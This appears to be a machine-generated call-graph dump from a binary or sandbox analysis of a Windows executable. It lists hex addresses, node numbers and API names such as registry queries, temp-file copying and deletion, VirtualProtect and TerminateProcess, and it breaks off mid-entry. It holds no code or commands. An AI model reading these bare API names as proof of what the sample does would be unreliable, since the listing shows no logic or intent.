92890->92892 92891->91997 92893 d8fd8b 22 API calls 92892->92893 92894 db3eb6 __fread_nolock 92893->92894 92895 d71033 92900 d76633 92895->92900 92899 d71042 92901 d7c25d 22 API calls 92900->92901 92902 d766a1 92901->92902 92908 d7597b 92902->92908 92905 d7673e 92906 d71038 92905->92906 92911 d76b97 22 API calls __fread_nolock 92905->92911 92907 d90023 29 API calls __onexit 92906->92907 92907->92899 92912 d759a7 92908->92912 92911->92905 92913 d7599a 92912->92913 92914 d759b4 92912->92914 92913->92905 92914->92913 92915 d759bb RegOpenKeyExW 92914->92915 92915->92913 92916 d759d5 RegQueryValueExW 92915->92916 92917 d759f6 92916->92917 92918 d75a0b RegCloseKey 92916->92918 92917->92918 92918->92913 92919 d810bf 92920 d810d3 92919->92920 92921 d815b6 92919->92921 92923 d815c2 92920->92923 92925 d8fd5b 22 API calls 92920->92925 92995 d7c5e7 23 API calls messages 92921->92995 92996 d7c5e7 23 API calls messages 92923->92996 92926 d810e5 92925->92926 92926->92923 92927 d8113e 92926->92927 92928 d8163d 92926->92928 92936 d8069d messages 92927->92936 92940 d82c10 92927->92940 92997 de1073 22 API calls 92928->92997 92931 dc52e7 92998 de34ba 82 API calls __wsopen_s 92931->92998 92933 d8fd5b 22 API calls 92939 d805f4 messages 92933->92939 92934 dc57f5 92935 dc51db 92935->92936 92938 d7c1c3 22 API calls 92935->92938 92937 d7c1c3 22 API calls 92937->92939 92938->92936 92939->92931 92939->92933 92939->92935 92939->92936 92939->92937 92941 d830b0 92940->92941 92942 d82c76 92940->92942 93136 d901c2 5 API calls __Init_thread_wait 92941->93136 92943 dc6f0c 92942->92943 92944 d82c90 92942->92944 93141 df6fc3 185 API calls 92943->93141 92999 d83220 92944->92999 92948 d830ba 92952 d7b606 22 API calls 92948->92952 92956 d830fb 92948->92956 92950 dc6f18 92950->92939 92951 d83220 9 API calls 92953 d82cb6 92951->92953 92960 d830d4 92952->92960 92955 d82cec 92953->92955 92953->92956 92954 dc6f21 92954->92939 92957 dc6f31 92955->92957 92962 d82d08 __fread_nolock 92955->92962 92956->92954 93138 d7c5e7 23 API calls messages 92956->93138 93142 de34ba 82 API calls __wsopen_s 92957->93142 93137 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92960->93137 92961 d83139 93139 d8d993 95 API calls 92961->93139 92962->92961 92965 dc6f49 92962->92965 92972 d8fd5b 22 API calls 92962->92972 92973 d8fd8b 22 API calls 92962->92973 92980 d82e2f 92962->92980 92983 dc6f8d 92962->92983 92988 d82ec7 messages 92962->92988 93143 de34ba 82 API calls __wsopen_s 92965->93143 92967 dc6fac 93145 df566c 54 API calls _wcslen 92967->93145 92968 d82e3c 92970 d83220 9 API calls 92968->92970 92971 d82e49 92970->92971 92975 d83220 9 API calls 92971->92975 92971->92988 92972->92962 92973->92962 92974 d83172 93140 d8fa6d 23 API calls 92974->93140 92985 d82e63 92975->92985 92977 d8301d 92977->92939 92978 d831ad 92978->92939 92980->92967 92980->92968 92981 d83220 9 API calls 92981->92988 93144 de34ba 82 API calls __wsopen_s 92983->93144 92984 d82f7b messages 92984->92977 93135 d8d593 22 API calls messages 92984->93135 92987 d7c1c3 22 API calls 92985->92987 92985->92988 92987->92988 92988->92974 92988->92981 92988->92984 92992 d768db 68 API calls 92988->92992 93009 ddd3ec 92988->93009 93012 dfe131 92988->93012 93048 de6e0f 92988->93048 93128 de1db4 92988->93128 93132 df94b2 92988->93132 93146 de34ba 82 API calls __wsopen_s 92988->93146 92992->92988 92995->92923 92996->92928 92997->92936 92998->92934 93000 d83261 92999->93000 93001 d8323d 92999->93001 93147 d901c2 5 API calls __Init_thread_wait 93000->93147 93002 d82ca0 93001->93002 93149 d901c2 5 API calls __Init_thread_wait 93001->93149 93002->92951 93005 d8326b 93005->93001 93148 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93005->93148 93006 d8a007 93006->93002 93150 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93006->93150 93151 dddadc lstrlenW 93009->93151 93013 d7c25d 22 API calls 93012->93013 93014 dfe148 93013->93014 93015 d78e90 53 API calls 93014->93015 93016 dfe157 93015->93016 93017 d77c18 22 API calls 93016->93017 93018 dfe16a 93017->93018 93019 d78e90 53 API calls 93018->93019 93020 dfe177 93019->93020 93021 dfe18f 93020->93021 93022 dfe1f4 93020->93022 93175 d7ce67 39 API calls 93021->93175 93023 d78e90 53 API calls 93022->93023 93025 dfe1f9 93023->93025 93027 dfe206 93025->93027 93028 dfe241 93025->93028 93026 dfe194 93026->93027 93030 dfe1ad 93026->93030 93176 d7b5c1 22 API calls 93027->93176 93031 dfe259 93028->93031 93177 d7ce67 39 API calls 93028->93177 93032 d786ac 22 API calls 93030->93032 93034 dfe272 93031->93034 93178 d7ce67 39 API calls 93031->93178 93036 dfe1ba 93032->93036 93035 d7c1c3 22 API calls 93034->93035 93038 dfe28c 93035->93038 93039 d77cf8 22 API calls 93036->93039 93156 dd9227 93038->93156 93041 dfe1c8 93039->93041 93042 d786ac 22 API calls 93041->93042 93043 dfe1e1 93042->93043 93044 d77cf8 22 API calls 93043->93044 93047 dfe1ef 93044->93047 93045 dfe213 93045->92988 93179 d77c5d 22 API calls 93047->93179 93049 d7c25d 22 API calls 93048->93049 93050 de6e3b 93049->93050 93051 d7c25d 22 API calls 93050->93051 93052 de6e44 93051->93052 93053 de6e58 93052->93053 93298 d7ce67 39 API calls 93052->93298 93055 d78e90 53 API calls 93053->93055 93056 de6e75 _wcslen 93055->93056 93057 de6fdd 93056->93057 93058 de6eda 93056->93058 93070 de7007 93056->93070 93060 d7686d 94 API calls 93057->93060 93059 d78e90 53 API calls 93058->93059 93062 de6ee6 93059->93062 93061 de6fee 93060->93061 93063 de7003 93061->93063 93064 d7686d 94 API calls 93061->93064 93066 d7c1c3 22 API calls 93062->93066 93068 de6ef9 93062->93068 93065 d7c25d 22 API calls 93063->93065 93063->93070 93064->93063 93067 de7038 93065->93067 93066->93068 93071 d7c25d 22 API calls 93067->93071 93069 de6f45 93068->93069 93072 de6f23 93068->93072 93075 d7c1c3 22 API calls 93068->93075 93073 d78e90 53 API calls 93069->93073 93070->92988 93074 de7044 93071->93074 93076 d752b7 22 API calls 93072->93076 93077 de6f52 93073->93077 93078 d7c25d 22 API calls 93074->93078 93075->93072 93079 de6f2d 93076->93079 93080 de6f5b 93077->93080 93081 de6f65 93077->93081 93082 de704d 93078->93082 93084 d78e90 53 API calls 93079->93084 93085 d7c1c3 22 API calls 93080->93085 93299 dde0b7 GetFileAttributesW 93081->93299 93083 d7c25d 22 API calls 93082->93083 93088 de7056 93083->93088 93089 de6f39 93084->93089 93085->93081 93087 de6f6e 93090 de6f81 93087->93090 93093 d7660f 22 API calls 93087->93093 93091 d78e90 53 API calls 93088->93091 93092 d77cf8 22 API calls 93089->93092 93095 d78e90 53 API calls 93090->93095 93101 de6f87 93090->93101 93094 de7063 93091->93094 93092->93069 93093->93090 93096 d76bff 22 API calls 93094->93096 93097 de6fbe 93095->93097 93098 de7084 93096->93098 93300 ddcf94 57 API calls 93097->93300 93100 d7660f 22 API calls 93098->93100 93102 de7093 93100->93102 93101->93070 93103 de70c7 93102->93103 93105 d7660f 22 API calls 93102->93105 93104 d7c1c3 22 API calls 93103->93104 93106 de70d8 93104->93106 93107 de70a4 93105->93107 93108 d77cf8 22 API calls 93106->93108 93107->93103 93110 d784e7 22 API calls 93107->93110 93109 de70e6 93108->93109 93111 d77cf8 22 API calls 93109->93111 93112 de70b9 93110->93112 93113 de70f4 93111->93113 93114 d784e7 22 API calls 93112->93114 93115 d77cf8 22 API calls 93113->93115 93114->93103 93116 de7102 93115->93116 93117 d78e90 53 API calls 93116->93117 93118 de710e 93117->93118 93189 ddd6da 93118->93189 93120 de711f 93121 ddd3ec 4 API calls 93120->93121 93122 de7129 93121->93122 93123 d78e90 53 API calls 93122->93123 93126 de7157 93122->93126 93124 de7147 93123->93124 93243 de2865 93124->93243 93127 d768db 68 API calls 93126->93127 93127->93070 93129 de1dbd 93128->93129 93130 de1dc2 93128->93130 93377 de0e85 93129->93377 93130->92988 93398 df7e80 93132->93398 93134 df94c2 93134->92988 93135->92984 93136->92948 93137->92956 93138->92961 93139->92974 93140->92978 93141->92950 93142->92988 93143->92988 93144->92988 93145->92985 93146->92988 93147->93005 93148->93001 93149->93006 93150->93002 93152 dddafa GetFileAttributesW 93151->93152 93153 ddd3f3 93151->93153 93152->93153 93154 dddb06 FindFirstFileW 93152->93154 93153->92988 93154->93153 93155 dddb17 FindClose 93154->93155 93155->93153 93157 d7c25d 22 API calls 93156->93157 93158 dd923d 93157->93158 93159 d77c18 22 API calls 93158->93159 93160 dd9251 93159->93160 93167 dd9273 93160->93167 93180 dd8daa 93160->93180 93162 dd8daa 41 API calls 93162->93167 93164 d786ac 22 API calls 93164->93167 93165 d786ac 22 API calls 93165->93167 93166 d77cf8 22 API calls 93166->93167 93167->93162 93167->93165 93167->93166 93168 dd9312 93167->93168 93171 dd92f6 93167->93171 93169 d7c1c3 22 API calls 93168->93169 93170 dd9321 93168->93170 93169->93170 93170->93047 93172 d786ac 22 API calls 93171->93172 93173 dd9306 93172->93173 93174 d77cf8 22 API calls 93173->93174 93174->93168 93175->93026 93176->93045 93177->93031 93178->93034 93179->93045 93181 dd8dca _wcslen 93180->93181 93182 dd8eb9 93181->93182 93185 dd8dff 93181->93185 93186 dd8ebe 93181->93186 93182->93164 93182->93167 93185->93182 93187 d8d5dc 41 API calls 93185->93187 93186->93182 93188 d8d5dc 41 API calls 93186->93188 93187->93185 93188->93186 93190 ddd6f6 93189->93190 93191 ddd6fb 93190->93191 93192 ddd711 93190->93192 93194 d7c1c3 22 API calls 93191->93194 93242 ddd70c 93191->93242 93193 d7c25d 22 API calls 93192->93193 93195 ddd719 93193->93195 93194->93242 93196 d7c25d 22 API calls 93195->93196 93197 ddd721 93196->93197 93198 d7c25d 22 API calls 93197->93198 93199 ddd72c 93198->93199 93200 d7c25d 22 API calls 93199->93200 93201 ddd734 93200->93201 93202 d7c25d 22 API calls 93201->93202 93203 ddd73c 93202->93203 93204 d7c25d 22 API calls 93203->93204 93205 ddd744 93204->93205 93206 d7c25d 22 API calls 93205->93206 93207 ddd74c 93206->93207 93208 d7c25d 22 API calls 93207->93208 93209 ddd754 93208->93209 93210 d76bff 22 API calls 93209->93210 93211 ddd76b 93210->93211 93212 d76bff 22 API calls 93211->93212 93213 ddd784 93212->93213 93214 d7660f 22 API calls 93213->93214 93215 ddd790 93214->93215 93216 ddd7a3 93215->93216 93217 d7ad22 22 API calls 93215->93217 93218 d7660f 22 API calls 93216->93218 93217->93216 93219 ddd7ac 93218->93219 93220 ddd7bc 93219->93220 93221 d7ad22 22 API calls 93219->93221 93222 ddd7ce 93220->93222 93223 d7c1c3 22 API calls 93220->93223 93221->93220 93224 d77cf8 22 API calls 93222->93224 93223->93222 93225 ddd7d9 93224->93225 93301 ddd896 22 API calls 93225->93301 93227 ddd7e8 93302 ddd896 22 API calls 93227->93302 93229 ddd7fb 93230 d7660f 22 API calls 93229->93230 93231 ddd805 93230->93231 93232 ddd81c 93231->93232 93233 ddd80a 93231->93233 93234 d7660f 22 API calls 93232->93234 93235 d752b7 22 API calls 93233->93235 93237 ddd825 93234->93237 93236 ddd817 93235->93236 93240 d77cf8 22 API calls 93236->93240 93238 ddd843 93237->93238 93239 d752b7 22 API calls 93237->93239 93241 d77cf8 22 API calls 93238->93241 93239->93236 93240->93238 93241->93242 93242->93120 93244 de2872 __wsopen_s 93243->93244 93245 d8fd8b 22 API calls 93244->93245 93246 de288f 93245->93246 93247 d770c2 22 API calls 93246->93247 93248 de2899 93247->93248 93249 de266c 27 API calls 93248->93249 93250 de28a4 93249->93250 93251 d76abf 64 API calls 93250->93251 93252 de28b9 93251->93252 93253 de28dd 93252->93253 93254 de298a 93252->93254 93255 de2d84 75 API calls 93253->93255 93256 de2d84 75 API calls 93254->93256 93257 de28e2 93255->93257 93258 de2956 93256->93258 93262 de2993 messages 93257->93262 93316 d9d513 26 API calls 93257->93316 93260 d76a95 40 API calls 93258->93260 93258->93262 93261 de29af 93260->93261 93263 d76a95 40 API calls 93261->93263 93262->93126 93265 de29bf 93263->93265 93264 de290b 93317 d9d513 26 API calls 93264->93317 93266 d76a95 40 API calls 93265->93266 93268 de29da 93266->93268 93269 d76a95 40 API calls 93268->93269 93270 de29ea 93269->93270 93271 d76a95 40 API calls 93270->93271 93272 de2a05 93271->93272 93273 d76a95 40 API calls 93272->93273 93274 de2a15 93273->93274 93275 d76a95 40 API calls 93274->93275 93276 de2a25 93275->93276 93277 d76a95 40 API calls 93276->93277 93278 de2a35 93277->93278 93303 de2f35 GetTempPathW GetTempFileNameW 93278->93303 93280 de2a40 93281 d9e57b 29 API calls 93280->93281 93292 de2a51 93281->93292 93282 de2b0b 93283 d9e608 67 API calls 93282->93283 93284 de2b16 93283->93284 93286 de2b1c DeleteFileW 93284->93286 93287 de2b30 93284->93287 93285 d76a95 40 API calls 93285->93292 93286->93262 93288 de2baf CopyFileW 93287->93288 93294 de2b36 93287->93294 93289 de2bd7 DeleteFileW 93288->93289 93290 de2bc5 DeleteFileW 93288->93290 93313 de2ef6 CreateFileW 93289->93313 93290->93262 93292->93262 93292->93282 93292->93285 93304 d9db43 93292->93304 93318 de21ec 79 API calls 93294->93318 93296 de2b9a 93296->93289 93297 de2b9e DeleteFileW 93296->93297 93297->93262 93298->93053 93299->93087 93300->93101 93301->93227 93302->93229 93303->93280 93305 d9db6d 93304->93305 93306 d9db51 93304->93306 93305->93292 93306->93305 93307 d9db5d 93306->93307 93308 d9db73 93306->93308 93322 d9f269 20 API calls _abort 93307->93322 93319 d9d95c 93308->93319 93311 d9db62 93323 da277c 26 API calls _strftime 93311->93323 93314 de2f1d SetFileTime CloseHandle 93313->93314 93315 de2f31 93313->93315 93314->93315 93315->93262 93316->93264 93317->93258 93318->93296 93324 d9d90b 93319->93324 93321 d9d980 93321->93305 93322->93311 93323->93305 93325 d9d917 ___scrt_is_nonwritable_in_current_image 93324->93325 93332 d9911d EnterCriticalSection 93325->93332 93327 d9d925 93333 d9d984 93327->93333 93331 d9d943 __fread_nolock 93331->93321 93332->93327 93341 da4931 93333->93341 93339 d9d932 93340 d9d950 LeaveCriticalSection __fread_nolock 93339->93340 93340->93331 93342 d9d8e5 __fread_nolock 26 API calls 93341->93342 93343 da4940 93342->93343 93362 daf83c 93343->93362 93345 da4946 93349 d9d999 93345->93349 93371 da37b0 21 API calls 2 library calls 93345->93371 93347 da49a5 93348 da2958 _free 20 API calls 93347->93348 93348->93349 93350 d9d9ca 93349->93350 93351 d9d9dc 93350->93351 93356 d9d9b4 93350->93356 93352 d9d9ea 93351->93352 93351->93356 93358 d9da15 __fread_nolock 93351->93358 93375 d9f269 20 API calls _abort 93352->93375 93354 d9d9ef 93376 da277c 26 API calls _strftime 93354->93376 93361 da49e6 62 API calls 93356->93361 93357 d9db9b 62 API calls 93357->93358 93358->93356 93358->93357 93359 d9d8e5 __fread_nolock 26 API calls 93358->93359 93360 da594e __wsopen_s 62 API calls 93358->93360 93359->93358 93360->93358 93361->93339 93363 daf849 93362->93363 93364 daf856 93362->93364 93372 d9f269 20 API calls _abort 93363->93372 93366 daf862 93364->93366 93373 d9f269 20 API calls _abort 93364->93373 93366->93345 93368 daf84e 93368->93345 93369 daf883 93374 da277c 26 API calls _strftime 93369->93374 93371->93347 93372->93368 93373->93369 93374->93368 93375->93354 93376->93356 93378 de0e9c 93377->93378 93392 de0fb5 93377->93392 93379 de0ebc 93378->93379 93380 de0ee9 93378->93380 93382 de0f00 93378->93382 93379->93380 93384 de0ed0 93379->93384 93381 d8fd8b 22 API calls 93380->93381 93395 de0ede __fread_nolock 93381->93395 93383 d8fd8b 22 API calls 93382->93383 93393 de0f1d 93382->93393 93383->93393 93386 d8fd8b 22 API calls 93384->93386 93385 de0f44 93387 d8fd8b 22 API calls 93385->93387 93386->93395 93389 de0f4a 93387->93389 93388 d8fd5b 22 API calls 93388->93392 93396 d8f2b7 22 API calls 93389->93396 93391 de0f56 93397 d8f7a8 24 API calls 93391->93397 93392->93130 93393->93384 93393->93385 93393->93395 93395->93388 93396->93391 93397->93395 93399 d78e90 53 API calls 93398->93399 93400 df7eb7 93399->93400 93423 df7efc messages 93400->93423 93436 df8bfa 93400->93436 93402 df81a8 93403 df8376 93402->93403 93407 df81b6 93402->93407 93475 df8e0b 60 API calls 93403->93475 93406 df8385 93406->93407 93408 df8391 93406->93408 93449 df7dad 93407->93449 93408->93423 93409 d78e90 53 API calls 93425 df7f70 93409->93425 93414 df81ef 93464 d8fbf0 93414->93464 93417 df820f 93470 de34ba 82 API calls __wsopen_s 93417->93470 93418 df8229 93420 d77d93 22 API calls 93418->93420 93422 df8238 93420->93422 93421 df821a GetCurrentProcess TerminateProcess 93421->93418 93424 d783e0 22 API calls 93422->93424 93423->93134 93426 df8251 93424->93426 93425->93402 93425->93409 93425->93423 93468 dd40c5 22 API calls __fread_nolock 93425->93468 93469 df8444 42 API calls _strftime 93425->93469 93434 df8279 93426->93434 93471 d81df0 22 API calls 93426->93471 93428 df83ec 93428->93423 93432 df8400 FreeLibrary 93428->93432 93429 df8268 93472 df8aa2 75 API calls 93429->93472 93432->93423 93434->93428 93473 d81df0 22 API calls 93434->93473 93474 d7c5e7 23 API calls messages 93434->93474 93476 df8aa2 75 API calls 93434->93476 93437 d7c7c9 22 API calls 93436->93437 93438 df8c15 CharLowerBuffW 93437->93438 93439 dd8daa 41 API calls 93438->93439 93440 df8c36 93439->93440 93442 d7c25d 22 API calls 93440->93442 93448 df8c6f _wcslen 93440->93448 93443 df8c51 93442->93443 93444 d786ac 22 API calls 93443->93444 93445 df8c65 93444->93445 93446 d7ad22 22 API calls 93445->93446 93446->93448 93447 df8d85 _wcslen 93447->93425 93448->93447 93477 df8444 42 API calls _strftime 93448->93477 93450 df7dc8 93449->93450 93451 df7e13 93449->93451 93452 d8fd8b 22 API calls 93450->93452 93455 df8fbd 93451->93455 93453 df7dea 93452->93453 93453->93451 93454 d8fd5b 22 API calls 93453->93454 93454->93453 93456 df91d2 messages 93455->93456 93463 df8fe1 _strcat _wcslen 93455->93463 93456->93414 93457 d7ce67 39 API calls 93457->93463 93458 d7cc8f 39 API calls 93458->93463 93459 d7cfb5 39 API calls 93459->93463 93460 d78e90 53 API calls 93460->93463 93461 d9e99c 21 API calls ___std_exception_copy 93461->93463 93463->93456 93463->93457 93463->93458 93463->93459 93463->93460 93463->93461 93478 ddeecc 24 API calls _wcslen 93463->93478 93466 d8fc05 93464->93466 93465 d8fc9d VirtualProtect 93467 d8fc6b 93465->93467 93466->93465 93466->93467 93467->93417 93467->93418 93468->93425 93469->93425 93470->93421 93471->93429 93472->93434 93473->93434 93474->93434 93475->93406 93476->93434 93477->93447 93478->93463 93479 dc35db 93485 d7f0b0 messages 93479->93485 93480 d7f2d5 93481 d7f411 PeekMessageW 93481->93485 93482 d7f107 GetInputState 93482->93481 93482->93485 93484 dc2899 TranslateAcceleratorW 93484->93485 93485->93480 93485->93481 93485->93482 93485->93484 93486 d7f304 timeGetTime 93485->93486 93487 d7f473 TranslateMessage DispatchMessageW 93485->93487 93488 d7f48f PeekMessageW 93485->93488 93489 d7f4af Sleep 93485->93489 93490 dc374f Sleep 93485->93490 93491 dc29b5 timeGetTime 93485->93491 93508 d82c10 185 API calls 93485->93508 93510 d7f650 93485->93510 93517 d7f8d0 93485->93517 93538 d8ed18 IsDialogMessageW GetClassLongW 93485->93538 93540 de3948 23 API calls 93485->93540 93541 de34ba 82 API calls __wsopen_s 93485->93541 93486->93485 93487->93488 93488->93485 93494 d7f4c0 93489->93494 93490->93494 93539 d725c1 23 API calls 93491->93539 93492 d8e465 timeGetTime 93492->93494 93494->93485 93494->93492 93496 dc37e6 GetExitCodeProcess 93494->93496 93497 e028f2 GetForegroundWindow 93494->93497 93502 dc331d 93494->93502 93503 dc3884 Sleep 93494->93503 93542 df557f 23 API calls 93494->93542 93543 dde899 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93494->93543 93544 ddd3fa 47 API calls 93494->93544 93498 dc37fc WaitForSingleObject 93496->93498 93499 dc3812 CloseHandle 93496->93499 93497->93494 93498->93485 93498->93499 93499->93494 93501 dc3325 93502->93501 93503->93485 93508->93485 93511 d7f683 93510->93511 93512 d7f66f 93510->93512 93546 de34ba 82 API calls __wsopen_s 93511->93546 93545 d7eb60 185 API calls 2 library calls 93512->93545 93515 d7f67a 93515->93485 93516 dc3b50 93516->93516 93518 d7f910 93517->93518 93533 d7f9dc messages 93518->93533 93548 d901c2 5 API calls __Init_thread_wait 93518->93548 93521 dc3ba5 93523 d7c25d 22 API calls 93521->93523 93521->93533 93522 d7c25d 22 API calls 93522->93533 93525 dc3bbf 93523->93525 93549 d90023 29 API calls __onexit 93525->93549 93526 d7c117 41 API calls 93526->93533 93529 dc3bc9 93550 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93529->93550 93531 d7c1c3 22 API calls 93531->93533 93532 d81df0 22 API calls 93532->93533 93533->93522 93533->93526 93533->93531 93533->93532 93535 d7fce1 93533->93535 93537 de34ba 82 API calls 93533->93537 93547 d71d5f 94 API calls 93533->93547 93551 d901c2 5 API calls __Init_thread_wait 93533->93551 93552 d90023 29 API calls __onexit 93533->93552 93553 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93533->93553 93554 df67e8 95 API calls 93533->93554 93535->93485 93537->93533 93538->93485 93539->93485 93540->93485 93541->93485 93542->93494 93543->93494 93544->93494 93545->93515 93546->93516 93547->93533 93548->93521 93549->93529 93550->93533 93551->93533 93552->93533 93553->93533 93554->93533 93555 d7105b 93560 d7533e 93555->93560 93557 d7106a 93591 d90023 29 API calls __onexit 93557->93591 93559 d71074 93561 d7534e __wsopen_s 93560->93561 93562 d7c25d 22 API calls 93561->93562 93563 d75404 93562->93563 93564 d758e5 24 API calls 93563->93564 93565 d7540d 93564->93565 93592 d74d82 93565->93592 93568 d752b7 22 API calls 93569 d75426 93568->93569 93570 d76aff 22 API calls 93569->93570 93571 d75435 93570->93571 93572 d7c25d 22 API calls 93571->93572 93573 d7543e 93572->93573 93574 d7bfbf 22 API calls 93573->93574 93575 d75447 RegOpenKeyExW 93574->93575 93576 db3ed5 RegQueryValueExW 93575->93576 93580 d75469 93575->93580 93577 db3f6b RegCloseKey 93576->93577 93578 db3ef2 93576->93578 93577->93580 93590 db3f7d _wcslen 93577->93590 93579 d8fd8b 22 API calls 93578->93579 93581 db3f0b 93579->93581 93580->93557 93583 d770c2 22 API calls 93581->93583 93582 d7660f 22 API calls 93582->93590 93584 db3f16 RegQueryValueExW 93583->93584 93585 db3f33 93584->93585 93587 db3f4d messages 93584->93587 93586 d784e7 22 API calls 93585->93586 93586->93587 93587->93577 93588 d7b606 22 API calls 93588->93590 93589 d76aff 22 API calls 93589->93590 93590->93580 93590->93582 93590->93588 93590->93589 93591->93559 93593 db1ef0 __wsopen_s 93592->93593 93594 d74d8f GetFullPathNameW 93593->93594 93595 d74db1 93594->93595 93596 d784e7 22 API calls 93595->93596 93597 d74dcf 93596->93597 93597->93568 93598 dc1190 93599 dc1198 93598->93599 93602 d7d9ab 93598->93602 93635 dd7076 22 API calls __fread_nolock 93599->93635 93601 dc11ab 93636 dd6fef 22 API calls __fread_nolock 93601->93636 93625 d7c67d 93602->93625 93605 dc120f 93606 dc11ce 93606->93605 93637 df566c 54 API calls _wcslen 93606->93637 93609 d8fd5b 22 API calls 93613 d7da90 93609->93613 93610 dc1230 93610->93602 93638 dd7076 22 API calls __fread_nolock 93610->93638 93612 d7db53 93615 dc1551 93612->93615 93618 d7db97 messages 93612->93618 93613->93612 93614 d7c1c3 22 API calls 93613->93614 93623 d7dc50 messages 93613->93623 93614->93612 93639 d7c5e7 23 API calls messages 93615->93639 93620 dc159a 93618->93620 93632 d7c5e7 23 API calls messages 93618->93632 93621 d7dc35 93621->93620 93633 d7c000 22 API calls messages 93621->93633 93624 d7dcac 93623->93624 93634 d8d593 22 API calls messages 93623->93634 93626 d7c68e 93625->93626 93627 dc06b6 93625->93627 93628 d8fd5b 22 API calls 93626->93628 93629 d7c695 93628->93629 93640 d7c6c9 93629->93640 93632->93621 93633->93623 93634->93623 93635->93601 93636->93606 93637->93610 93638->93610 93639->93620 93643 d7c6d9 93640->93643 93641 d7c6b2 93641->93609 93642 d8fd5b 22 API calls 93642->93643 93643->93641 93643->93642 93644 d7c25d 22 API calls 93643->93644 93645 d7c1c3 22 API calls 93643->93645 93646 d7c6c9 22 API calls 93643->93646 93644->93643 93645->93643 93646->93643 93647 dc4b50 93656 d8d62d 93647->93656 93649 dc4b66 93651 dc4be1 93649->93651 93665 d725c1 23 API calls 93649->93665 93655 dc5663 93651->93655 93667 de34ba 82 API calls __wsopen_s 93651->93667 93653 dc4bc1 93653->93651 93666 de19dd 22 API calls 93653->93666 93655->93655 93657 d8d63b 93656->93657 93658 d8d64e 93656->93658 93668 d7c5e7 23 API calls messages 93657->93668 93660 d8d681 93658->93660 93661 d8d653 93658->93661 93669 d7c5e7 23 API calls messages 93660->93669 93662 d8fd5b 22 API calls 93661->93662 93664 d8d645 93662->93664 93664->93649 93665->93653 93666->93651 93667->93655 93668->93664 93669->93664 93670 d71098 93675 d7615e 93670->93675 93674 d710a7 93676 d7c25d 22 API calls 93675->93676 93677 d76175 GetVersionExW 93676->93677 93678 d784e7 22 API calls 93677->93678 93679 d761c2 93678->93679 93680 d7ad22 22 API calls 93679->93680 93689 d761f8 93679->93689 93681 d761ec 93680->93681 93683 d7562b 22 API calls 93681->93683 93682 d7629b GetCurrentProcess IsWow64Process 93684 d762b7 93682->93684 93683->93689 93685 db455b GetSystemInfo 93684->93685 93686 d762cf LoadLibraryA 93684->93686 93687 d762e0 GetProcAddress 93686->93687 93688 d7631c GetSystemInfo 93686->93688 93687->93688 93691 d762f0 GetNativeSystemInfo 93687->93691 93692 d762f6 93688->93692 93689->93682 93690 db4516 93689->93690 93691->93692 93693 d7109d 93692->93693 93694 d762fa FreeLibrary 93692->93694 93695 d90023 29 API calls __onexit 93693->93695 93694->93693 93695->93674 93696 d7f7e5 93699 d7d010 93696->93699 93700 d7d02b 93699->93700 93701 dc0d21 93700->93701 93702 dc0cd3 93700->93702 93723 d7d050 93700->93723 93737 df57c9 94 API calls 2 library calls 93701->93737 93705 dc0cdd 93702->93705 93708 dc0cea 93702->93708 93702->93723 93735 df5c5a 94 API calls 93705->93735 93724 d7d320 93708->93724 93736 df60f7 94 API calls 2 library calls 93708->93736 93711 dc0fb4 93711->93711 93714 d7d34e 93716 dc0efd 93740 df5b33 82 API calls 93716->93740 93719 d7c117 41 API calls 93719->93723 93722 d7d4e0 40 API calls 93722->93723 93723->93714 93723->93716 93723->93719 93723->93722 93723->93724 93725 d8dab2 40 API calls 93723->93725 93726 d7c1c3 22 API calls 93723->93726 93728 d8da6c 40 API calls 93723->93728 93729 d901c2 5 API calls __Init_thread_wait 93723->93729 93730 d713dc 22 API calls 93723->93730 93731 d90023 29 API calls __onexit 93723->93731 93732 d90178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93723->93732 93733 d8ec9e 82 API calls 93723->93733 93734 d8e596 83 API calls 93723->93734 93738 d7c5e7 23 API calls messages 93723->93738 93739 dcf5a8 23 API calls 93723->93739 93724->93714 93741 de34ba 82 API calls __wsopen_s 93724->93741 93725->93723 93726->93723 93728->93723 93729->93723 93730->93723 93731->93723 93732->93723 93733->93723 93734->93723 93735->93708 93736->93724 93737->93723 93738->93723 93739->93723 93740->93724 93741->93711 93742 d71044 93747 d729fe 93742->93747 93744 d7104a 93783 d90023 29 API calls __onexit 93744->93783 93746 d71054 93784 d72ca3 93747->93784 93751 d72a75 93752 d7c25d 22 API calls 93751->93752 93753 d72a7f 93752->93753 93754 d7c25d 22 API calls 93753->93754 93755 d72a89 93754->93755 93756 d7c25d 22 API calls 93755->93756 93757 d72a93 93756->93757 93758 d7c25d 22 API calls 93757->93758 93759 d72ad1 93758->93759 93760 d7c25d 22 API calls 93759->93760 93761 d72b9d 93760->93761 93794 d73027 93761->93794 93765 d72bcf 93766 d7c25d 22 API calls 93765->93766 93767 d72bd9 93766->93767 93768 d83220 9 API calls 93767->93768 93769 d72c04 93768->93769 93815 d733b6 93769->93815 93771 d72c20 93772 d72c30 GetStdHandle 93771->93772 93773 d72c85 93772->93773 93774 db3011 93772->93774 93778 d72c92 OleInitialize 93773->93778 93774->93773 93775 db301a 93774->93775 93776 d8fd5b 22 API calls 93775->93776 93777 db3021 93776->93777 93822 de003b InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 93777->93822 93778->93744 93780 db302a 93823 de0862 CreateThread 93780->93823 93782 db3036 CloseHandle 93782->93773 93783->93746 93824 d72cfc 93784->93824 93787 d72cfc 22 API calls 93788 d72cdb 93787->93788 93789 d7c25d 22 API calls 93788->93789 93790 d72ce7 93789->93790 93791 d784e7 22 API calls 93790->93791 93792 d72a34 93791->93792 93793 d734ce 6 API calls 93792->93793 93793->93751 93795 d7c25d 22 API calls 93794->93795 93796 d73037 93795->93796 93797 d7c25d 22 API calls 93796->93797 93798 d7303f 93797->93798 93799 d7c25d 22 API calls 93798->93799 93800 d7305a 93799->93800 93801 d8fd5b 22 API calls 93800->93801 93802 d72ba7 93801->93802 93803 d73455 93802->93803 93804 d73463 93803->93804 93805 d7c25d 22 API calls 93804->93805 93806 d7346e 93805->93806 93807 d7c25d 22 API calls 93806->93807 93808 d73479 93807->93808 93809 d7c25d 22 API 